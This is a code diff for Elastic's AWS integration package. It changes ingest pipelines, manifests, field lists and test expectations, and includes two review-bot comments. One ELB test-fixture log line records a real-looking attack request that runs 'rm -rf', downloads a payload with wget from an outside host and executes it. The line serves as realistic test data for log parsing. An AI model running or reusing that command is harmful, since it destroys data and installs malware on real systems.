+++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-upload-ssh-public-key-json.log-expected.json @@ -55,7 +55,9 @@ "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EXAMPLE_ID\",\"arn\":\"arn:aws:iam::0123456789012:user/Alice\",\"accountId\":\"0123456789012\",\"accessKeyId\":\"EXAMPLE_KEY\",\"userName\":\"Alice\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"true\",\"creationDate\":\"2020-01-10T14:38:30Z\"}},\"invokedBy\":\"signin.amazonaws.com\"},\"eventTime\":\"2020-01-10T16:06:40Z\",\"eventSource\":\"iam.amazonaws.com\",\"eventName\":\"UploadSSHPublicKey\",\"awsRegion\":\"us-east-1\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"signin.amazonaws.com\",\"requestParameters\":{\"sSHPublicKeyBody\":\"ssh-rsa AAAAdeadcodedeadcode Alice@localhost.domain\",\"userName\":\"Alice\"},\"responseElements\":{\"sSHPublicKey\":{\"fingerprint\":\"de:ad:c0:de:de:ad:c0:de:de:ad:c0:de:de:ad:c0:de\",\"status\":\"Active\",\"uploadDate\":\"Jan 10, 2020 4:06:40 PM\",\"userName\":\"Alice\",\"sSHPublicKeyId\":\"EXAMPLE_KEY_ID\",\"sSHPublicKeyBody\":\"ssh-rsa AAAAdeadcodedeadcode Alice@localhost.domain\"}},\"requestID\":\"EXAMPLE-44b9-41cd-90f2-EXAMPLE\",\"eventID\":\"EXAMPLE-9a9d-4da4-9998-EXAMPLE\",\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"0123456789012\"}", "outcome": "success", "provider": "iam.amazonaws.com", - "type": "info" + "type": [ + "info" + ] }, "related": { "user": [ diff --git a/packages/aws/data_stream/cloudtrail/elasticsearch/ingest_pipeline/default.yml b/packages/aws/data_stream/cloudtrail/elasticsearch/ingest_pipeline/default.yml index 1736d2ff8288..a872a6e6f70a 100644 --- a/packages/aws/data_stream/cloudtrail/elasticsearch/ingest_pipeline/default.yml +++ b/packages/aws/data_stream/cloudtrail/elasticsearch/ingest_pipeline/default.yml 
@@ -612,7 +612,7 @@ processors: - change source: >- ctx.event.kind = 'event'; - ctx.event.type = 'info'; + ctx.event.type = ['info']; if (ctx?.aws?.cloudtrail?.error_code != null || ctx?.aws?.cloudtrail?.error_message != null) { ctx.event.outcome = 'failure' diff --git a/packages/aws/data_stream/cloudwatch_logs/manifest.yml b/packages/aws/data_stream/cloudwatch_logs/manifest.yml index 80391fbb4d96..86ff3e889bd9 100644 --- a/packages/aws/data_stream/cloudwatch_logs/manifest.yml +++ b/packages/aws/data_stream/cloudwatch_logs/manifest.yml @@ -128,6 +128,8 @@ streams: title: Dataset name description: > Set the name for your dataset. Changing the dataset will send the data to a different index. You can't use `-` in the name of a dataset and only valid characters for [Elasticsearch index names](https://www.elastic.co/guide/en/elasticsearch/reference/current/docs-index_.html). + # Ensures agents have permissions to write data to `logs-*-*` -elasticsearch.dynamic_dataset: true -elasticsearch.dynamic_namespace: true +elasticsearch: + dynamic_dataset: true + dynamic_namespace: true diff --git a/packages/aws/data_stream/dynamodb/fields/ecs.yml b/packages/aws/data_stream/dynamodb/fields/ecs.yml index 0d63728409a0..8e6c369edfc8 100644 --- a/packages/aws/data_stream/dynamodb/fields/ecs.yml +++ b/packages/aws/data_stream/dynamodb/fields/ecs.yml @@ -64,4 +64,4 @@ name: container.name - name: agent.id external: ecs - dimension: true \ No newline at end of file + dimension: true diff --git a/packages/aws/data_stream/ebs/fields/ecs.yml b/packages/aws/data_stream/ebs/fields/ecs.yml index 0d63728409a0..8e6c369edfc8 100644 --- a/packages/aws/data_stream/ebs/fields/ecs.yml +++ b/packages/aws/data_stream/ebs/fields/ecs.yml @@ -64,4 +64,4 @@ name: container.name - name: agent.id external: ecs - dimension: true \ No newline at end of file + dimension: true 
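Review bot: Making `ctx.event.type` a list at the top of this script changes what every later reader of the field sees, and the rest of the script and pipeline lies outside the hunk, so those readers need checking. A later Painless assignment of a bare string would put a scalar back, and a condition written as `ctx.event.type == 'info'` would silently stop matching; such conditions should become `ctx.event.type.contains('info')`. The same applies to the `event.category` change in elb_logs/elasticsearch/ingest_pipeline/default.yml (`value: [web]`, `value: [network]`), where a downstream `if: ctx.event.category == 'web'` would no longer be true. A short marker next to the assignment would help the next editor, written as `/* ECS: event.type is an array */` rather than a `//` comment, because the script sits in a folded `>-` scalar where a line comment would swallow the statements after it.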
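Review bot: The comment kept above the new `elasticsearch:` mapping says only that agents may write to `logs-*-*`, not why this data stream needs a grant that wide. I would extend it to something like `# Dataset name is user-configurable (see the "Dataset name" option above), so agents need write access to logs-*-* instead of a fixed index`. It is also worth confirming that the old dotted top-level keys were honoured; if they were ignored, this commit is the point at which the broader write permission actually takes effect and the changelog should say so. The same restructuring appears in ec2_logs/manifest.yml, where the option that justifies the wildcard is not visible in the hunk.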
diff --git a/packages/aws/data_stream/ec2_logs/manifest.yml b/packages/aws/data_stream/ec2_logs/manifest.yml index a47435b294f2..df69ef4bcc38 100644 --- a/packages/aws/data_stream/ec2_logs/manifest.yml +++ b/packages/aws/data_stream/ec2_logs/manifest.yml @@ -188,5 +188,6 @@ streams: multi: false default: false # Ensures agents have permissions to write data to `logs-*-*` -elasticsearch.dynamic_dataset: true -elasticsearch.dynamic_namespace: true +elasticsearch: + dynamic_dataset: true + dynamic_namespace: true diff --git a/packages/aws/data_stream/ecs_metrics/fields/ecs.yml b/packages/aws/data_stream/ecs_metrics/fields/ecs.yml index 0d63728409a0..8e6c369edfc8 100644 --- a/packages/aws/data_stream/ecs_metrics/fields/ecs.yml +++ b/packages/aws/data_stream/ecs_metrics/fields/ecs.yml @@ -64,4 +64,4 @@ name: container.name - name: agent.id external: ecs - dimension: true \ No newline at end of file + dimension: true diff --git a/packages/aws/data_stream/elb_logs/_dev/test/pipeline/test-alb.log-expected.json b/packages/aws/data_stream/elb_logs/_dev/test/pipeline/test-alb.log-expected.json index a993693e9388..c10d956ddb02 100644 --- a/packages/aws/data_stream/elb_logs/_dev/test/pipeline/test-alb.log-expected.json +++ b/packages/aws/data_stream/elb_logs/_dev/test/pipeline/test-alb.log-expected.json @@ -49,7 +49,9 @@ "version": "8.2.0" }, "event": { - "category": "web", + "category": [ + "web" + ], "end": "2018-07-02T22:23:00.186Z", "kind": "event", "original": "http 2018-07-02T22:23:00.186641Z app/my-loadbalancer/50dc6c495c0c9188 192.168.131.39:2817 10.0.0.1:80 0.000 0.001 0.000 200 200 34 366 \"GET http://www.example.com:80/ HTTP/1.1\" \"curl/7.46.0\" - - arn:aws:elasticloadbalancing:us-east-2:123456789012:targetgroup/my-targets/73e2d6bc24d8a067 \"Root=1-58337262-36d228ad5d99923122bbe354\" \"-\" \"-\" 0 2018-07-02T22:22:48.364000Z \"forward,redirect\" \"-\" \"-\" \"10.0.0.1:80\" \"200\" \"-\" \"-\"", 
@@ -125,7 +127,9 @@ "version": "8.2.0" }, "event": { - "category": "web", + "category": [ + "web" + ], "end": "2022-05-12T06:41:29.051Z", "kind": "event", "original": "http 2022-05-12T06:41:29.051646Z app/admin-LoadB-1EGHQRJIOLMFR/3011821a43ee0c5e 67.43.156.20:41542 - -1 -1 -1 301 - 233 390 \"GET http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+ a.tigoinari.tk/jaws;sh+/tmp/jaws HTTP/1.1\" \"Hello, world\" - - - \"Root=1-627cac19-4c6df30820daa80e3fd72ced\" \"-\" \"-\" 0 2022-05-12T06:41:29.051000Z \"redirect\" \"https://127.0.0.1:443/shell?cd+/tmp;rm+-rf+*;wget+ a.tigoinari.tk/jaws;sh+/tmp/jaws\" \"-\" \"-\" \"-\" \"Acceptable\" \"SpaceInUri\"", diff --git a/packages/aws/data_stream/elb_logs/elasticsearch/ingest_pipeline/default.yml b/packages/aws/data_stream/elb_logs/elasticsearch/ingest_pipeline/default.yml index 2d01b17540a3..f60949ae61f1 100644 --- a/packages/aws/data_stream/elb_logs/elasticsearch/ingest_pipeline/default.yml +++ b/packages/aws/data_stream/elb_logs/elasticsearch/ingest_pipeline/default.yml @@ -127,14 +127,14 @@ processors: - set: if: ctx.http != null field: event.category - value: web + value: [web] - set: field: aws.elb.protocol value: tcp if: ctx.http == null - set: field: event.category - value: network + value: [network] if: ctx.http == null - set: field: event.outcome diff --git a/packages/aws/data_stream/elb_logs/sample_event.json b/packages/aws/data_stream/elb_logs/sample_event.json index 2272aefa3509..61635a82e51f 100644 --- a/packages/aws/data_stream/elb_logs/sample_event.json +++ b/packages/aws/data_stream/elb_logs/sample_event.json 
@@ -47,7 +47,9 @@ "version": "8.0.0" }, "event": { - "category": "web", + "category": [ + "web" + ], "end": "2018-07-02T22:23:00.186Z", "kind": "event", "original": "http 2018-07-02T22:23:00.186641Z app/my-loadbalancer/50dc6c495c0c9188 192.168.131.39:2817 10.0.0.1:80 0.000 0.001 0.000 200 200 34 366 \"GET http://www.example.com:80/ HTTP/1.1\" \"curl/7.46.0\" - - arn:aws:elasticloadbalancing:us-east-2:123456789012:targetgroup/my-targets/73e2d6bc24d8a067 \"Root=1-58337262-36d228ad5d99923122bbe354\" \"-\" \"-\" 0 2018-07-02T22:22:48.364000Z \"forward,redirect\" \"-\" \"-\" \"10.0.0.1:80\" \"200\" \"-\" \"-\"", diff --git a/packages/aws/data_stream/elb_metrics/fields/ecs.yml b/packages/aws/data_stream/elb_metrics/fields/ecs.yml index 0d63728409a0..8e6c369edfc8 100644 --- a/packages/aws/data_stream/elb_metrics/fields/ecs.yml +++ b/packages/aws/data_stream/elb_metrics/fields/ecs.yml @@ -64,4 +64,4 @@ name: container.name - name: agent.id external: ecs - dimension: true \ No newline at end of file + dimension: true diff --git a/packages/aws/data_stream/emr_logs/_dev/test/pipeline/test-common-config.yml b/packages/aws/data_stream/emr_logs/_dev/test/pipeline/test-common-config.yml index 7780f71c7be2..0bdc8458a752 100644 --- a/packages/aws/data_stream/emr_logs/_dev/test/pipeline/test-common-config.yml +++ b/packages/aws/data_stream/emr_logs/_dev/test/pipeline/test-common-config.yml @@ -4,4 +4,4 @@ fields: multiline: first_line_pattern: '^[0-9]' negate: true - match: after \ No newline at end of file + match: after diff --git a/packages/aws/data_stream/emr_logs/_dev/test/pipeline/test-emr-hadoop.log-expected.json b/packages/aws/data_stream/emr_logs/_dev/test/pipeline/test-emr-hadoop.log-expected.json index 25994a1ff2fb..62e5737f5abb 100644 --- a/packages/aws/data_stream/emr_logs/_dev/test/pipeline/test-emr-hadoop.log-expected.json +++ b/packages/aws/data_stream/emr_logs/_dev/test/pipeline/test-emr-hadoop.log-expected.json 
@@ -1413,12 +1413,12 @@ "version": "8.0.0" }, "event": { - "original": "2023-06-26 13:45:51,244 INFO namenode.NNStorageRetentionManager: Going to retain 1 images with txid \u003e= 0" + "original": "2023-06-26 13:45:51,244 INFO namenode.NNStorageRetentionManager: Going to retain 1 images with txid >= 0" }, "log": { "level": "INFO" }, - "message": "Going to retain 1 images with txid \u003e= 0", + "message": "Going to retain 1 images with txid >= 0", "process": { "name": "namenode.NNStorageRetentionManager" }, diff --git a/packages/aws/data_stream/emr_logs/fields/ecs.yml b/packages/aws/data_stream/emr_logs/fields/ecs.yml index 249a3bb663a9..86819abe4f7d 100644 --- a/packages/aws/data_stream/emr_logs/fields/ecs.yml +++ b/packages/aws/data_stream/emr_logs/fields/ecs.yml @@ -57,4 +57,4 @@ - external: ecs name: container.name - external: ecs - name: log.level \ No newline at end of file + name: log.level diff --git a/packages/aws/data_stream/emr_logs/fields/fields.yml b/packages/aws/data_stream/emr_logs/fields/fields.yml index d25df0d5191e..9c2b3e5d5584 100644 --- a/packages/aws/data_stream/emr_logs/fields/fields.yml +++ b/packages/aws/data_stream/emr_logs/fields/fields.yml @@ -25,4 +25,4 @@ description: Process entrypoint. - name: process.message type: keyword - description: Process message. \ No newline at end of file + description: Process message. diff --git a/packages/aws/data_stream/emr_logs/manifest.yml b/packages/aws/data_stream/emr_logs/manifest.yml index 68dade863ccf..27e72b798594 100644 --- a/packages/aws/data_stream/emr_logs/manifest.yml +++ b/packages/aws/data_stream/emr_logs/manifest.yml @@ -228,5 +228,6 @@ streams: multi: false default: false # Ensures agents have permissions to write data to `logs-*-*` -elasticsearch.dynamic_dataset: true -elasticsearch.dynamic_namespace: true +elasticsearch: + dynamic_dataset: true + dynamic_namespace: true 
diff --git a/packages/aws/data_stream/emr_metrics/fields/fields.yml b/packages/aws/data_stream/emr_metrics/fields/fields.yml index da72d8b1215e..3724f65f84ea 100644 --- a/packages/aws/data_stream/emr_metrics/fields/fields.yml +++ b/packages/aws/data_stream/emr_metrics/fields/fields.yml @@ -1,6 +1,5 @@ - name: aws type: group - release: beta fields: - name: elasticmapreduce type: group @@ -272,4 +271,4 @@ - name: JobFlowId type: keyword dimension: true - description: Filters metrics by cluster ID. \ No newline at end of file + description: Filters metrics by cluster ID. diff --git a/packages/aws/data_stream/kinesis/fields/ecs.yml b/packages/aws/data_stream/kinesis/fields/ecs.yml index ffdd5f1facd4..40dfe1a68c99 100644 --- a/packages/aws/data_stream/kinesis/fields/ecs.yml +++ b/packages/aws/data_stream/kinesis/fields/ecs.yml @@ -64,4 +64,4 @@ name: container.id - name: agent.id external: ecs - dimension: true \ No newline at end of file + dimension: true diff --git a/packages/aws/data_stream/lambda/fields/ecs.yml b/packages/aws/data_stream/lambda/fields/ecs.yml index 0d63728409a0..8e6c369edfc8 100644 --- a/packages/aws/data_stream/lambda/fields/ecs.yml +++ b/packages/aws/data_stream/lambda/fields/ecs.yml @@ -64,4 +64,4 @@ name: container.name - name: agent.id external: ecs - dimension: true \ No newline at end of file + dimension: true diff --git a/packages/aws/data_stream/natgateway/fields/ecs.yml b/packages/aws/data_stream/natgateway/fields/ecs.yml index 0d63728409a0..8e6c369edfc8 100644 --- a/packages/aws/data_stream/natgateway/fields/ecs.yml +++ b/packages/aws/data_stream/natgateway/fields/ecs.yml @@ -64,4 +64,4 @@ name: container.name - name: agent.id external: ecs - dimension: true \ No newline at end of file + dimension: true diff --git a/packages/aws/data_stream/redshift/fields/ecs.yml b/packages/aws/data_stream/redshift/fields/ecs.yml index e3079b34bb99..73c5642cde2f 100644 --- a/packages/aws/data_stream/redshift/fields/ecs.yml 
+++ b/packages/aws/data_stream/redshift/fields/ecs.yml @@ -52,4 +52,4 @@ name: host.type - name: agent.id external: ecs - dimension: true \ No newline at end of file + dimension: true diff --git a/packages/aws/data_stream/route53_public_logs/fields/ecs.yml b/packages/aws/data_stream/route53_public_logs/fields/ecs.yml index bee83dc96b75..b78d8a3503f7 100644 --- a/packages/aws/data_stream/route53_public_logs/fields/ecs.yml +++ b/packages/aws/data_stream/route53_public_logs/fields/ecs.yml @@ -30,36 +30,14 @@ name: related.ip - external: ecs name: related.hosts -- external: ecs - name: source.address -- external: ecs - name: source.ip -- external: ecs - name: source.as.number -- external: ecs - name: source.as.organization.name -- name: source.geo.city_name - external: ecs - name: source.geo.continent_name external: ecs - name: source.geo.country_iso_code external: ecs -- name: source.geo.country_name - external: ecs -- name: source.geo.location - external: ecs -- name: source.geo.region_iso_code - external: ecs -- name: source.geo.region_name - external: ecs - external: ecs name: cloud.account.id - external: ecs name: cloud.region -- external: ecs - name: ecs.version -- external: ecs - name: error.message - external: ecs name: source.address - external: ecs @@ -68,10 +46,6 @@ name: source.as.organization.name - external: ecs name: source.geo.city_name -- external: ecs - name: source.geo.continent_name -- external: ecs - name: source.geo.country_iso_code - external: ecs name: source.geo.country_name - description: Longitude and latitude. @@ -84,8 +58,6 @@ name: source.geo.region_name - external: ecs name: source.ip -- external: ecs - name: tags - external: ecs name: host.architecture - external: ecs diff --git a/packages/aws/data_stream/route53_resolver_logs/fields/ecs.yml b/packages/aws/data_stream/route53_resolver_logs/fields/ecs.yml index 3b9d9e07b22c..25dcf94c7d0a 100644 --- a/packages/aws/data_stream/route53_resolver_logs/fields/ecs.yml 
+++ b/packages/aws/data_stream/route53_resolver_logs/fields/ecs.yml @@ -36,24 +36,12 @@ name: related.hosts - external: ecs name: source.port -- external: ecs - name: source.address - external: ecs name: source.ip -- external: ecs - name: source.as.number - external: ecs name: source.as.organization.name -- name: source.geo.city_name - external: ecs -- name: source.geo.continent_name - external: ecs - name: source.geo.country_iso_code external: ecs -- name: source.geo.country_name - external: ecs -- name: source.geo.location - external: ecs - name: source.geo.region_iso_code external: ecs - name: source.geo.region_name @@ -62,36 +50,20 @@ name: cloud.account.id - external: ecs name: cloud.region -- external: ecs - name: ecs.version -- external: ecs - name: error.message - external: ecs name: source.address - external: ecs name: source.as.number -- external: ecs - name: source.as.organization.name - external: ecs name: source.geo.city_name - external: ecs name: source.geo.continent_name -- external: ecs - name: source.geo.country_iso_code - external: ecs name: source.geo.country_name - description: Longitude and latitude. level: core name: source.geo.location type: geo_point -- external: ecs - name: source.geo.region_iso_code -- external: ecs - name: source.geo.region_name -- external: ecs - name: source.ip -- external: ecs - name: tags - external: ecs name: host.architecture - external: ecs diff --git a/packages/aws/data_stream/route53_resolver_logs/sample_event.json b/packages/aws/data_stream/route53_resolver_logs/sample_event.json index 77e86321a091..c949cf58cde4 100644 --- a/packages/aws/data_stream/route53_resolver_logs/sample_event.json +++ b/packages/aws/data_stream/route53_resolver_logs/sample_event.json @@ -40,7 +40,7 @@ "data_stream": { "namespace": "default", "type": "logs", - "dataset": "aws.route53_public_logs" + "dataset": "aws.route53_resolver_logs" }, "dns": { "question": { 
diff --git a/packages/aws/data_stream/s3_storage_lens/fields/fields.yml b/packages/aws/data_stream/s3_storage_lens/fields/fields.yml index 67a494b46f28..616e006accd1 100644 --- a/packages/aws/data_stream/s3_storage_lens/fields/fields.yml +++ b/packages/aws/data_stream/s3_storage_lens/fields/fields.yml @@ -1,6 +1,5 @@ - name: aws type: group - release: experimental fields: - name: s3_storage_lens type: group diff --git a/packages/aws/data_stream/s3access/_dev/test/pipeline/test-s3-server-access.log-expected.json b/packages/aws/data_stream/s3access/_dev/test/pipeline/test-s3-server-access.log-expected.json index 924ec1df42ad..34ddf79d268a 100644 --- a/packages/aws/data_stream/s3access/_dev/test/pipeline/test-s3-server-access.log-expected.json +++ b/packages/aws/data_stream/s3access/_dev/test/pipeline/test-s3-server-access.log-expected.json @@ -15,7 +15,7 @@ "operation": "REST.GET.LOCATION", "remote_ip": "89.160.20.156", "request_id": "44EE8651683CB4DA", - "request_uri": "GET /test-s3-ks/?location\u0026aws-account=627959692251 HTTP/1.1", + "request_uri": "GET /test-s3-ks/?location&aws-account=627959692251 HTTP/1.1", "requester": "arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9", "signature_version": "SigV4", "tls_version": "TLSv1.2", @@ -25,6 +25,18 @@ }, "client": { "address": "89.160.20.156", + "geo": { + "city_name": "Linköping", + "continent_name": "Europe", + "country_iso_code": "SE", + "country_name": "Sweden", + "location": { + "lat": 58.4167, + "lon": 15.6167 + }, + "region_iso_code": "SE-E", + "region_name": "Östergötland County" + }, "ip": "89.160.20.156", "user": { "id": "arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9" 
@@ -43,7 +55,7 @@ "duration": 17000000, "id": "44EE8651683CB4DA", "kind": "event", - "original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:41 +0000] 89.160.20.156 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 44EE8651683CB4DA REST.GET.LOCATION - \"GET /test-s3-ks/?location\u0026aws-account=627959692251 HTTP/1.1\" 200 - 142 - 17 - \"-\" \"AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation\" - BsCfJedfuSnds2QFoxi+E/O7M6OEWzJnw4dUaes/2hyA363sONRJKzB7EOY+Bt9DTHYUn+HoHxI= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2", + "original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:41 +0000] 89.160.20.156 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 44EE8651683CB4DA REST.GET.LOCATION - \"GET /test-s3-ks/?location&aws-account=627959692251 HTTP/1.1\" 200 - 142 - 17 - \"-\" \"AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation\" - BsCfJedfuSnds2QFoxi+E/O7M6OEWzJnw4dUaes/2hyA363sONRJKzB7EOY+Bt9DTHYUn+HoHxI= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2", "outcome": "success", "type": [ "access" @@ -90,9 +102,9 @@ "version_protocol": "tls" }, "url": { - "original": "/test-s3-ks/?location\u0026aws-account=627959692251", + "original": "/test-s3-ks/?location&aws-account=627959692251", "path": "/test-s3-ks/", - "query": "location\u0026aws-account=627959692251" + "query": "location&aws-account=627959692251" }, "user_agent": { "device": { 
@@ -123,7 +135,7 @@ "operation": "REST.GET.LOCATION", "remote_ip": "89.160.20.156", "request_id": "E26222010BCC32B6", - "request_uri": "GET /test-s3-ks/?location\u0026aws-account=627959692251 HTTP/1.1", + "request_uri": "GET /test-s3-ks/?location&aws-account=627959692251 HTTP/1.1", "requester": "arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9", "signature_version": "SigV4", "tls_version": "TLSv1.2", @@ -133,6 +145,18 @@ }, "client": { "address": "89.160.20.156", + "geo": { + "city_name": "Linköping", + "continent_name": "Europe", + "country_iso_code": "SE", + "country_name": "Sweden", + "location": { + "lat": 58.4167, + "lon": 15.6167 + }, + "region_iso_code": "SE-E", + "region_name": "Östergötland County" + }, "ip": "89.160.20.156", "user": { "id": "arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9" 
@@ -151,7 +175,7 @@ "duration": 3000000, "id": "E26222010BCC32B6", "kind": "event", - "original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:42 +0000] 89.160.20.156 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 E26222010BCC32B6 REST.GET.LOCATION - \"GET /test-s3-ks/?location\u0026aws-account=627959692251 HTTP/1.1\" 200 - 142 - 3 - \"-\" \"AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation\" - gNl/Q1IzY6nGTBygqI3rnMz/ZFOFwOTDpSMrNca+IcEmMAd6sCIs1ZRLYDekD8LB9lrj9UdQLWE= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2", + "original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:42 +0000] 89.160.20.156 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 E26222010BCC32B6 REST.GET.LOCATION - \"GET /test-s3-ks/?location&aws-account=627959692251 HTTP/1.1\" 200 - 142 - 3 - \"-\" \"AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation\" - gNl/Q1IzY6nGTBygqI3rnMz/ZFOFwOTDpSMrNca+IcEmMAd6sCIs1ZRLYDekD8LB9lrj9UdQLWE= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2", "outcome": "success", "type": [ "access" @@ -198,9 +222,9 @@ "version_protocol": "tls" }, "url": { - "original": "/test-s3-ks/?location\u0026aws-account=627959692251", + "original": "/test-s3-ks/?location&aws-account=627959692251", "path": "/test-s3-ks/", - "query": "location\u0026aws-account=627959692251" + "query": "location&aws-account=627959692251" }, "user_agent": { "device": { 
@@ -231,7 +255,7 @@ "operation": "REST.GET.BUCKET", "remote_ip": "89.160.20.156", "request_id": "4DD6D17D1C5C401C", - "request_uri": "GET /test-s3-ks/?max-keys=0\u0026encoding-type=url\u0026aws-account=627959692251 HTTP/1.1", + "request_uri": "GET /test-s3-ks/?max-keys=0&encoding-type=url&aws-account=627959692251 HTTP/1.1", "requester": "arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9", "signature_version": "SigV4", "tls_version": "TLSv1.2", @@ -242,6 +266,18 @@ }, "client": { "address": "89.160.20.156", + "geo": { + "city_name": "Linköping", + "continent_name": "Europe", + "country_iso_code": "SE", + "country_name": "Sweden", + "location": { + "lat": 58.4167, + "lon": 15.6167 + }, + "region_iso_code": "SE-E", + "region_name": "Östergötland County" + }, "ip": "89.160.20.156", "user": { "id": "arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9" 
@@ -260,7 +296,7 @@ "duration": 2000000, "id": "4DD6D17D1C5C401C", "kind": "event", - "original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:43 +0000] 89.160.20.156 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 4DD6D17D1C5C401C REST.GET.BUCKET - \"GET /test-s3-ks/?max-keys=0\u0026encoding-type=url\u0026aws-account=627959692251 HTTP/1.1\" 200 - 265 - 2 1 \"-\" \"AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation\" - KzvchfojYQnuFC4PABYVJVxIlv/f6r17LRaTSvw7x+bxj4PkkPKT1kX9x8wbqtq40iD4PC881iE= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2", + "original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:43 +0000] 89.160.20.156 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 4DD6D17D1C5C401C REST.GET.BUCKET - \"GET /test-s3-ks/?max-keys=0&encoding-type=url&aws-account=627959692251 HTTP/1.1\" 200 - 265 - 2 1 \"-\" \"AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation\" - KzvchfojYQnuFC4PABYVJVxIlv/f6r17LRaTSvw7x+bxj4PkkPKT1kX9x8wbqtq40iD4PC881iE= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2", "outcome": "success", "type": [ "access" 
@@ -307,9 +343,9 @@ "version_protocol": "tls" }, "url": { - "original": "/test-s3-ks/?max-keys=0\u0026encoding-type=url\u0026aws-account=627959692251", + "original": "/test-s3-ks/?max-keys=0&encoding-type=url&aws-account=627959692251", "path": "/test-s3-ks/", - "query": "max-keys=0\u0026encoding-type=url\u0026aws-account=627959692251" + "query": "max-keys=0&encoding-type=url&aws-account=627959692251" }, "user_agent": { "device": { @@ -340,7 +376,7 @@ "operation": "REST.GET.LOCATION", "remote_ip": "89.160.20.156", "request_id": "706992E2F3CC3C3D", - "request_uri": "GET /test-s3-ks/?location\u0026aws-account=627959692251 HTTP/1.1", + "request_uri": "GET /test-s3-ks/?location&aws-account=627959692251 HTTP/1.1", "requester": "arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9", "signature_version": "SigV4", "tls_version": "TLSv1.2", @@ -350,6 +386,18 @@ }, "client": { "address": "89.160.20.156", + "geo": { + "city_name": "Linköping", + "continent_name": "Europe", + "country_iso_code": "SE", + "country_name": "Sweden", + "location": { + "lat": 58.4167, + "lon": 